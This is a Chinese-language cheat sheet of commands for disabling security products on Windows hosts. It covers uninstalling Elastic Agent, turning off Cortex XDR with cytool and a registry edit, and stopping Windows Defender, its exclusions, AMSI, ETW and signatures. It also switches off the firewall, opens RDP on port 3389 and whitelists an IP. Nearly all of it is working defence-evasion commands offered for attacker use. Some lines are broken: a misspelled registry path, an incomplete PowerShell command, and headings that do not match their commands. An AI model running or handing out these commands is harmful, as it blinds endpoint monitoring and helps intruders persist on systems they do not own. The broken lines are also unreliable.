关闭防病毒软件

Sophos

https://github.com/ayeskatalas/Sophos-Removal-Tool/

Symantec

https://knowledge.broadcom.com/external/article/178870/download-the-cleanwipe-removal-tool-to-u.html

Elastic EDR

https://www.elastic.co/guide/en/fleet/current/uninstall-elastic-agent.html
  cd "C:\Program Files\Elastic\Agent\"
  PS C:\Program Files\Elastic\Agent> .\elastic-agent.exe uninstall
  Elastic Agent will be uninstalled from your system at C:\Program Files\Elastic\Agent. Do you want to continue? [Y/n]:Y
  Elastic Agent has been uninstalled.

Cortex XDR

https://mrd0x.com/cortex-xdr-analysis-and-bypass/
卸载密码：Password1
Password hash is located in C:\ProgramData\Cyvera\LocalSystem\Persistence\agent_settings.db
Look for PasswordHash, PasswordSalt or password, salt strings.

禁用Cortex：将DLL改成随机值，然后重启
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CryptSvc\Parameters /t REG_EXPAND_SZ /v ServiceDll /d nothing.dll /f

启动时禁用，重启生效
cytool.exe startup disable

禁用对 Cortex XDR 文件、进程、注册表和服务的保护
cytool.exe protect disable

禁用 Cortex XDR（即使启用了篡改保护）
cytool.exe runtime disable

禁用事件收集
cytool.exe event_collection disable

禁用Windows Defender

禁用Defender
sc config WinDefend start= disabled
sc stop WinDefend
Set-MpPreference -DisableRealtimeMonitoring $true

排除进程/位置
Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe"
Add-MpPreference -ExclusionProcess 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
Add-MpPreference -ExclusionPath C:\Video, C:\install

禁用扫描所有下载的文件和附件，禁用 AMSI
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
PS C:\> Set-MpPreference -DisableIOAVProtection $true
禁用 AMSI (设置为0为启动)
PS C:\> Set-MpPreference -DisableScriptScanning 1 

清零 ETW 会话对应的注册表值
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

擦除当前存储的定义
MpCmdRun.exe 的位置：C:\ProgramData\Microsoft\Windows Defender\Platform\
MpCmdRun.exe -RemoveDefinitions -All

删除签名
PS > & "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All
PS > & "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

禁用 Windows Defender 安全中心
reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

禁用实时保护
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

防火墙

允许进站
如果系统未配置过远程桌面服务，第一次开启时还需要添加防火墙规则，允许3389端口，命令如下:
>netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
>netsh firewall set portopening TCP 3389 ENABLE
防火墙关闭
>netsh firewall set opmode mode=disable
>netsh advfirewall show allprofiles查看状态
>netsh advfirewall set allprofiles state off 
>sc stop windefend
>sc delete windefend
PS> Set-MpPreference -DisableRealtimeMonitoring 1
PS> Set-MpPreference -Disablearchivescanning $true
IP白名单
>New-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress 10.10.10.10
列出防火墙的阻止端口
>$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules |  where {$_.action -eq "0"} | select name,applicationname,localports
禁用防火墙
在 Windows 7 上通过 cmd 禁用防火墙
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurentControlSet\Control\Terminal Server"  /v fDenyTSConnections /t REG_DWORD /d 0 /f

在 Windows 7 上通过 Powershell 禁用防火墙
powershell.exe -ExecutionPolicy Bypass -command 'Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" –Value'`

通过 cmd 在任何windows上禁用防火墙
netsh firewall set opmode disable
netsh Advfirewall set allprofiles state off

最后更新于3年前